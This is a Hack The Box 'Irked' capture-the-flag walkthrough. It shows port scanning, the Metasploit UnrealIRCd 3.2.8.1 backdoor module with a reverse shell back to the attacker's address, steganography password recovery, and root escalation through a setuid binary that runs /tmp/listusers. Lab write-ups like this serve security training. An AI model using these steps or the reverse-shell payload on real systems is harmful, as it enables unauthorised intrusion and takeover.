Pages

Search

HTB Irked

$ nmap -A -T4 -p- 10.10.10.117

Starting Nmap 7.91 ( https://nmap.org ) at 2020-10-15 22:50 CEST
Nmap scan report for 10.10.10.117
Host is up (0.043s latency).
Not shown: 65528 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey: 
|   1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
|   2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
|   256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
|_  256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Site doesn't have a title (text/html).
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          36864/udp6  status
|   100024  1          39620/udp   status
|   100024  1          44996/tcp6  status
|_  100024  1          59146/tcp   status
6697/tcp  open  irc     UnrealIRCd
8067/tcp  open  irc     UnrealIRCd
59146/tcp open  status  1 (RPC #100024)
65534/tcp open  irc     UnrealIRCd (Admin email djmardov@irked.htb)
Service Info: Host: irked.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 65.04 seconds

Access to http://10.10.10.117

According to Nmap’s results, we have open these ports related to UrealIRCd:

  • 6697/tcp open irc UnrealIRCd
  • 8067/tcp open irc UnrealIRCd
  • 65534/tcp open irc UnrealIRCd (Admin email djmardov@irked.htb)

As we have an IRC in this box let’s start trying to connect to it.

$ sudo irssi 10.10.10.117 65534

Irssi v1.2.2-1+b1 - https://irssi.org             
17:18 -!- Irssi: Looking up 10.10.10.117
17:18 -!- Irssi: The following settings were initialized
17:18                        real_name root
17:18                        user_name root
17:18                             nick root
17:18 -!- Irssi: Connecting to 10.10.10.117 [10.10.10.117] port 65534
17:18 -!- Irssi: Connection to 10.10.10.117 established
17:18 !irked.htb *** Looking up your hostname...
17:18 !irked.htb *** Couldn't resolve your hostname; using your IP address instead
17:18 -!- You have not registered
17:18 -!- Welcome to the ROXnet IRC Network root!root@10.10.14.25
17:18 -!- Your host is irked.htb, running version Unreal3.2.8.1
17:18 -!- This server was created Mon May 14 2018 at 13:12:50 EDT
17:18 -!- irked.htb Unreal3.2.8.1 iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGj
17:18 -!- UHNAMES NAMESX SAFELIST HCN MAXCHANNELS=10 CHANLIMIT=#:10 MAXLIST=b:60,e:60,I:60 NICKLEN=30 CHANNELLEN=32 TOPICLEN=307 KICKLEN=307 AWAYLEN=307 
          MAXTARGETS=20 are supported by this server
17:18 -!- WALLCHOPS WATCH=128 WATCHOPTS=A SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+ CHANMODES=beI,kfL,lj,psmntirRcOAQKVCuzNSMTG NETWORK=ROXnet 
          CASEMAPPING=ascii EXTBAN=~,cqnr ELIST=MNUCT STATUSMSG=~&@%+ are supported by this server
17:18 -!- EXCEPTS INVEX CMDS=KNOCK,MAP,DCCALLOW,USERIP are supported by this server
17:18 -!- There are 1 users and 0 invisible on 1 servers
17:18 -!- I have 1 clients and 0 servers
17:18 -!- Current Local Users: 1  Max: 2
17:18 -!- Current Global Users: 1  Max: 2
17:18 -!- MOTD File is missing
17:18 -!- Mode change [+iwx] for user root

According to this, we have a UnrealIRC version 3.2.8.1

$ searchsploit unrealirc

------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                |  Path
------------------------------------------------------------------------------ ---------------------------------
UnrealIRCd 3.2.8.1 - Backdoor Command Execution (Metasploit)                  | linux/remote/16922.rb
UnrealIRCd 3.2.8.1 - Local Configuration Stack Overflow                       | windows/dos/18011.txt
UnrealIRCd 3.2.8.1 - Remote Downloader/Execute                                | linux/remote/13853.pl
UnrealIRCd 3.x - Remote Denial of Service                                     | windows/dos/27407.pl
------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results

Exploiting UnrealIRC

According to https://www.exploit-db.com/exploits/16922

UnrealIRCd 3.2.8.1, as distributed on certain mirror sites from November 2009 through June 2010, contains an externally introduced modification (Trojan Horse) in the DEBUG3_DOLOG_SYSTEM macro, which allows remote attackers to execute arbitrary commands.

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2075

We can use a Metasploit module directly.

msf5 > search unrealirc

Matching Modules
================

   #  Name                                        Disclosure Date  Rank       Check  Description
   -  ----                                        ---------------  ----       -----  -----------
   0  exploit/unix/irc/unreal_ircd_3281_backdoor  2010-06-12       excellent  No     UnrealIRCD 3.2.8.1 Backdoor Command Execution

msf5 > use 0
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > options

Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   6667             yes       The target port (TCP)

Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set rhost 10.10.10.117
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set rport 65534
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > show payloads

Compatible Payloads
===================

   #   Name                                Disclosure Date  Rank    Check  Description
   -   ----                                ---------------  ----    -----  -----------
   0   cmd/unix/bind_perl                                   manual  No     Unix Command Shell, Bind TCP (via Perl)
   1   cmd/unix/bind_perl_ipv6                              manual  No     Unix Command Shell, Bind TCP (via perl) IPv6
   2   cmd/unix/bind_ruby                                   manual  No     Unix Command Shell, Bind TCP (via Ruby)
   3   cmd/unix/bind_ruby_ipv6                              manual  No     Unix Command Shell, Bind TCP (via Ruby) IPv6
   4   cmd/unix/generic                                     manual  No     Unix Command, Generic Command Execution
   5   cmd/unix/reverse                                     manual  No     Unix Command Shell, Double Reverse TCP (telnet)
   6   cmd/unix/reverse_bash_telnet_ssl                     manual  No     Unix Command Shell, Reverse TCP SSL (telnet)
   7   cmd/unix/reverse_perl                                manual  No     Unix Command Shell, Reverse TCP (via Perl)
   8   cmd/unix/reverse_perl_ssl                            manual  No     Unix Command Shell, Reverse TCP SSL (via perl)
   9   cmd/unix/reverse_ruby                                manual  No     Unix Command Shell, Reverse TCP (via Ruby)
   10  cmd/unix/reverse_ruby_ssl                            manual  No     Unix Command Shell, Reverse TCP SSL (via Ruby)
   11  cmd/unix/reverse_ssl_double_telnet                   manual  No     Unix Command Shell, Double Reverse TCP SSL (telnet)

msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > use 5
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > show options

Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  10.10.10.117     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   65534            yes       The target port (TCP)

Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > run

[-] 10.10.10.117:65534 - Exploit failed: An exploitation error occurred.
[*] Exploit completed, but no session was created.
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set payload cmd/unix/reverse 
payload => cmd/unix/reverse

msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > show options

Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  10.10.10.117     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   65534            yes       The target port (TCP)

Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set lhost 10.10.14.25
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > show options

Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  10.10.10.117     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   65534            yes       The target port (TCP)

Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.14.25      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > run

[*] Started reverse TCP double handler on 10.10.14.25:4444 
[*] 10.10.10.117:65534 - Connected to 10.10.10.117:65534...
    :irked.htb NOTICE AUTH :*** Looking up your hostname...
[*] 10.10.10.117:65534 - Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo nRUzxoihQNyXr1sC;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "nRUzxoihQNyXr1sC\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.10.14.25:4444 -> 10.10.10.117:52954) at

whoami

ircd

python3 -c "import pty;pty.spawn('/bin/bash')"

ircd@irked:~$

ircd@irked:/home/djmardov/Documents$ ls -la

total 16
drwxr-xr-x  2 djmardov djmardov 4096 May 15  2018 .
drwxr-xr-x 18 djmardov djmardov 4096 Nov  3  2018 ..
-rw-r--r--  1 djmardov djmardov   52 May 16  2018 .backup
-rw-------  1 djmardov djmardov   33 May 15  2018 user.txt

ircd@irked:/home/djmardov/Documents$ cat .backup

Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss

Based on this comment we seem to be with the steganography.
In the steganography, messages are hidden usually into images.

How many images have we seen so far?
Only in http://10.10.10.117

Download this image to our local machine.

$ ls 

irked.jpg linpeas.sh results

$ steghide extract -sf irked.jpg

Anotar salvoconducto: 
anot� los datos extra�dos e/"pass.txt".

Use password found in .backup file.

$ cat pass.txt

Kab6h+m+bbp2J:HG

ircd@irked:/home$ su djmardov

Password: Kab6h+m+bbp2J:HG

djmardov@irked:/home$ ls

djmardov  ircd

djmardov@irked:/home$ cd djmardov
djmardov@irked:~$ cd Documents
djmardov@irked:~/Documents$ cat user.txt

4a66XXXXXXXXXXXXXXXXXXXXXXXXXXXX

Based on the Linpeas results, the list of the suid files is this.

====================================( Interesting Files )=====================================                                                                                
[+] SUID - Check easy privesc, exploits and write perms                                
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid          
-rwsr-sr-x 1 root   root       9.3K Apr  1  2014 /usr/bin/X                            
-rwsr-xr-x 1 root   root        95K Aug 13  2014 /sbin/mount.nfs
-rwsr-sr-x 1 daemon daemon      50K Sep 30  2014 /usr/bin/at  --->  RTru64_UNIX_4.0g(CVE-2002-1614)                                                                           
-rwsr-xr-x 1 root   root        14K Oct 14  2014 /usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
-rwsr-xr-x 1 root   root        26K Mar 29  2015 /bin/umount  --->  BSD/Linux(08-1996)
-rwsr-xr-x 1 root   root        34K Mar 29  2015 /bin/mount  --->  Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8                                              
-rwsr-xr-- 1 root   dip        332K Apr 14  2015 /usr/sbin/pppd  --->  Apple_Mac_OSX_10.4.8(05-2007)                                                                          
-rwsr-xr-x 1 root   root        34K Jan 21  2016 /bin/fusermount
-rwsr-xr-x 1 root   root        14K Sep  8  2016 /usr/lib/policykit-1/polkit-agent-helper-1                                                                                   
-rwsr-xr-x 1 root   root        18K Sep  8  2016 /usr/bin/pkexec  --->  Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485)                                             
-rwsr-xr-- 1 root   messagebus 355K Nov 21  2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper                                                                                  
-rwsr-xr-x 1 root   root       158K Jan 28  2017 /bin/ntfs-3g  --->  Debian9/8/7/Ubuntu/Gentoo/others/Ubuntu_Server_16.10_and_others(02-2017)                                 
-rwsr-xr-x 1 root   root       9.3K Mar 28  2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root   root        52K May 17  2017 /usr/bin/passwd  --->  Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)               
-rwsr-xr-x 1 root   root        77K May 17  2017 /usr/bin/gpasswd
-rwsr-xr-x 1 root   root        43K May 17  2017 /usr/bin/chsh
-rwsr-xr-x 1 root   root        52K May 17  2017 /usr/bin/chfn  --->  SuSE_9.3/10
-rwsr-xr-x 1 root   root        38K May 17  2017 /usr/bin/newgrp  --->  HP-UX_10.20
-rwsr-xr-x 1 root   root        38K May 17  2017 /bin/su
-rwsr-sr-x 1 root   mail        94K Nov 18  2017 /usr/bin/procmail
-rwsr-xr-x 1 root   root       550K Nov 19  2017 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root   root       1.1M Feb 10  2018 /usr/sbin/exim4
-rwsr-xr-x 1 root   root       7.2K May 16  2018 /usr/bin/viewuser

By default, /usr/bin/viewuser is not installed in a Linux system.
So we have a 1st candidate to analyze.

djmardov@irked:/usr/bin$ ls -la viewuser

-rwsr-xr-x 1 root root 7328 May 16  2018 viewuser

djmardov@irked:/usr/bin$ file viewuser

viewuser: setuid ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=69ba4bc75bf72037f1ec492bc4cde2550eeac4bb, not stripped

djmardov@irked:/usr/bin$ ./viewuser

This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2020-10-15 16:45 (:0)
sh: 1: /tmp/listusers: not found

$ scp djmardov@10.10.10.117:/usr/bin/viewuser viewuser

The authenticity of host '10.10.10.117 (10.10.10.117)' can't be established.
ECDSA key fingerprint is SHA256:kunqU6QEf9TV3pbsZKznVcntLklRwiVobFZiJguYs4g.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.117' (ECDSA) to the list of known hosts.
djmardov@10.10.10.117's password: 
viewuser

$ r2 viewuser

[0x00000440]> aaaa
[x] Analyze all flags starting with sym. and entry0 (aa)
[x] Analyze function calls (aac)
[x] Analyze len bytes of instructions for references (aar)
[x] Check for objc references
[x] Check for vtables
[x] Type matching analysis for all functions (aaft)
[x] Propagate noreturn information
[x] Use -AA or aaaa to perform additional experimental analysis.
[x] Finding function preludes
[x] Enable constraint types analysis for variables

[0x00000440]> afl

0x00000440    1 49           entry0
0x00000472    1 4            fcn.00000472
0x00000410    1 6            sym.imp.__libc_start_main
0x00000490    4 58   -> 53   sym.deregister_tm_clones
0x00000579    1 4            sym.__x86.get_pc_thunk.dx
0x000004d0    4 71           sym.register_tm_clones
0x00000520    5 71           entry.fini0
0x00000480    1 4            sym.__x86.get_pc_thunk.bx
0x00000570    1 9            entry.init0
0x00000660    1 2            sym.__libc_csu_fini
0x00000664    1 20           sym._fini
0x00000600    4 93           sym.__libc_csu_init
0x0000057d    1 126          main
0x000003f0    1 6            sym.imp.puts
0x00000400    1 6            sym.imp.system
0x00000420    1 6            sym.imp.setuid
0x000003bc    3 35           sym._init
0x00000000    2 32           loc.imp._ITM_deregisterTMCloneTable

[0x00000440]> pdf @main

┌ 126: int main (int32_t arg_4h);
│           ; var int32_t var_8h @ ebp-0x8
│           ; arg int32_t arg_4h @ esp+0x24
│           0x0000057d      8d4c2404       lea ecx, dword [arg_4h]
│           0x00000581      83e4f0         and esp, 0xfffffff0
│           0x00000584      ff71fc         push dword [ecx - 4]
│           0x00000587      55             push ebp
│           0x00000588      89e5           mov ebp, esp
│           0x0000058a      53             push ebx
│           0x0000058b      51             push ecx
│           0x0000058c      e8effeffff     call sym.__x86.get_pc_thunk.bx
│           0x00000591      81c36f1a0000   add ebx, 0x1a6f
│           0x00000597      83ec0c         sub esp, 0xc
│           0x0000059a      8d8380e6ffff   lea eax, dword [ebx - 0x1980]
│           0x000005a0      50             push eax                    ; const char *s
│           0x000005a1      e84afeffff     call sym.imp.puts           ; int puts(const char *s)
│           0x000005a6      83c410         add esp, 0x10
│           0x000005a9      83ec0c         sub esp, 0xc
│           0x000005ac      8d83c8e6ffff   lea eax, dword [ebx - 0x1938]
│           0x000005b2      50             push eax                    ; const char *s
│           0x000005b3      e838feffff     call sym.imp.puts           ; int puts(const char *s)
│           0x000005b8      83c410         add esp, 0x10
│           0x000005bb      83ec0c         sub esp, 0xc
│           0x000005be      8d83ede6ffff   lea eax, dword [ebx - 0x1913]
│           0x000005c4      50             push eax                    ; const char *string
│           0x000005c5      e836feffff     call sym.imp.system         ; int system(const char *string)
│           0x000005ca      83c410         add esp, 0x10
│           0x000005cd      83ec0c         sub esp, 0xc
│           0x000005d0      6a00           push 0
│           0x000005d2      e849feffff     call sym.imp.setuid
│           0x000005d7      83c410         add esp, 0x10
│           0x000005da      83ec0c         sub esp, 0xc
│           0x000005dd      8d83f1e6ffff   lea eax, dword [ebx - 0x190f]
│           0x000005e3      50             push eax                    ; const char *string
│           0x000005e4      e817feffff     call sym.imp.system         ; int system(const char *string)
│           0x000005e9      83c410         add esp, 0x10
│           0x000005ec      b800000000     mov eax, 0
│           0x000005f1      8d65f8         lea esp, dword [var_8h]
│           0x000005f4      59             pop ecx
│           0x000005f5      5b             pop ebx
│           0x000005f6      5d             pop ebp
│           0x000005f7      8d61fc         lea esp, dword [ecx - 4]
└           0x000005fa      c3             ret

According to this information this application calls to setuid function and later calls system function to run the parameter (/tmp/listusers)

This can be exploited by creating a file /tmp/listusers with a malicious code which will get executed by root when it is called by the viewuser binary.

djmardov@irked:/tmp$ echo "/bin/sh" > listusers

echo "/bin/sh" > listusers

djmardov@irked:/tmp$ cd /usr/bin
djmardov@irked:/usr/bin$ ./viewuser

This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2020-10-15 16:45 (:0)
sh: 1: /tmp/listusers: Permission denied

djmardov@irked:/usr/bin$ cd /tmp
djmardov@irked:/tmp$ chmod 777 listusers
djmardov@irked:/tmp$ cd /usr/bin
djmardov@irked:/usr/bin$ ./viewuse

This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2020-10-15 16:45 (:0)
#

#whoami

root

#cd /root
#ls

pass.txt root.txt

#cat pass.txt

Kab6h+m+bbp2J:HG

#cat root.txt

8d8eXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *